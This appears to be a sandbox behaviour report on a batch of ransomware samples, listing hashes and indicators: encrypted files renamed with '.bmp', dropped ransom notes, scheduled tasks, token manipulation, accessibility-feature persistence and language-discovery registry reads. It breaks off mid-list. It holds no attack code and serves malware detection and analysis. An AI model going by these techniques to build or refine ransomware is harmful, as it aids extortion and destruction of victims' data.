Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exeTrojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exeVHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exepid Process 3952 Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe 9012 VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe -
Processes:
resource yara_rule behavioral1/files/0x0008000000023c9b-98.dat upx behavioral1/memory/3352-99-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/memory/3352-943-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/memory/5576-17524-0x0000000000400000-0x00000000004C4000-memory.dmp upx behavioral1/memory/5576-17698-0x0000000000400000-0x00000000004C4000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exeosk.exeSUPERAntiSpywarePro.exedescription ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\lib\ant-javafx.jar HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning_2x.png.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\cryptix.md.bmp osk.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files\VideoLAN\VLC\locale\el\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\ui-strings.js.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_pt_BR.properties.bmp osk.exe File created C:\Program Files\Java\jdk-1.8\jre\LICENSE.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ru-ru\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\it-IT\PSGet.Resource.psd1.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\Windows Media Player\Media Renderer\avtransport.xml HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-2x.png HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\ui-strings.js.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil.png.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files\dotnet\host\fxr\7.0.16\Instructions for recovery FILES.TXT osk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\ui-strings.js HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\plugin.js.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files\VideoLAN\VLC\locale\es\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\ui-strings.js.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\files_icons.png HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations_retina.png.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-down_32.svg.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\win_x64\READMEPLEASE.TXT osk.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\thaidict.md.bmp osk.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\santuario.md.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ja_135x40.svg.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\fr-FR\PSGet.Resource.psd1.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\PlayStore_icon.svg.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\resources.jar HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\ui-strings.js.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\it-it\ui-strings.js.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe SUPERAntiSpywarePro.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\READMEPLEASE.TXT HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\ui-strings.js HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations.png.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\ui-strings.js HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File created C:\Program Files\7-Zip\Lang\uz.txt.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\ui-strings.js HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ui-strings.js.bmp HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\ui-strings.js HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\ui-strings.js HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe -
Drops file in Windows directory 2 IoCs
Processes:
SUPERAntiSpyware.exedescription ioc Process File created C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 46d09772-9978-4697-83aa-7e886ef9c712.job SUPERAntiSpyware.exe File created C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 8b6a2d98-729b-4cad-87b7-b2189eb2e527.job SUPERAntiSpyware.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid Process 5304 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
Processes:
Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exepid Process 6508 Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target Process procid_target 7376 1872 WerFault.exe 109 5132 9012 WerFault.exe 150 -
System Location Discovery: System Language Discovery 1 TTPs 60 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exeVHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.execmd.execmd.exeiexplorer.execmd.exeHEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exeHEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.execmd.exeWScript.exenet.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-0aeebcfcadc1e2f2f95b3bbc8d1edf5dad6f10fcfdae0cadc8672c238621112e.exeWMIC.exeTrojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.execmd.exeHEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exetpvpyme.exeTrojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exeosk.exeTrojan-Ransom.Win32.Blocker.lckf-19205dc779799f71ecdff8dd7ec4a2a9106540d143a713e2c847e1f58266b0f3.exeTrojan-Ransom.Win32.Gen.nse-25adae704fe3ee1591e751d24dfff1b17f834fac79fd9f7a7495b4753f2a1006.exenet1.exeVHO-Trojan-Ransom.Win32.Convagent.gen-a6955b8539e4bf51bc4c0b9dd9c7c410cf1b8892741401409ec2c685db104ccc.exeVHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.execmd.execmd.execmd.execmd.exeUDS-Trojan-Ransom.Win32.Foreign-5b0e1cb6a13ca4074731d087948d4b59c670c33c857fdf29472080f50453dbef.exemshta.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exesc.execmd.exereg.exeVHO-Trojan-Ransom.Win32.PornoBlocker.gen-7882a3a461e5ab50fc62584efdc1dd4c2beb8c7af9ea7ee98085b68320ebf7fc.execmd.exeadd.exeSUPERAntiSpywarePro.execmd.execmd.execmd.exeregedit.exeregedit.exeHEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exeInstall.execmd.exepowershell.exe$TMP$001.exereg.exewinupas.execmd.exeHEUR-Trojan-Ransom.Win32.PornoAsset.gen-7654394bbdcc63d7ce5b825a87370e66d098e195af7b40abab5188744f94ac6e.exeTrojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exeVHO-Trojan-Ransom.Win32.Gen.gen-1d7671a21350324eff8fe60dd3f02e984097a9d54266492c0409a5ffd8c555cc.execmd.exemshta.exeTrojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exereg.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.gen-0aeebcfcadc1e2f2f95b3bbc8d1edf5dad6f10fcfdae0cadc8672c238621112e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tpvpyme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language osk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.lckf-19205dc779799f71ecdff8dd7ec4a2a9106540d143a713e2c847e1f58266b0f3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Gen.nse-25adae704fe3ee1591e751d24dfff1b17f834fac79fd9f7a7495b4753f2a1006.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.Convagent.gen-a6955b8539e4bf51bc4c0b9dd9c7c410cf1b8892741401409ec2c685db104ccc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Foreign-5b0e1cb6a13ca4074731d087948d4b59c670c33c857fdf29472080f50453dbef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage VHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.PornoBlocker.gen-7882a3a461e5ab50fc62584efdc1dd4c2beb8c7af9ea7ee98085b68320ebf7fc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language add.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SUPERAntiSpywarePro.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $TMP$001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winupas.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.PornoAsset.gen-7654394bbdcc63d7ce5b825a87370e66d098e195af7b40abab5188744f94ac6e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language VHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.Gen.gen-1d7671a21350324eff8fe60dd3f02e984097a9d54266492c0409a5ffd8c555cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 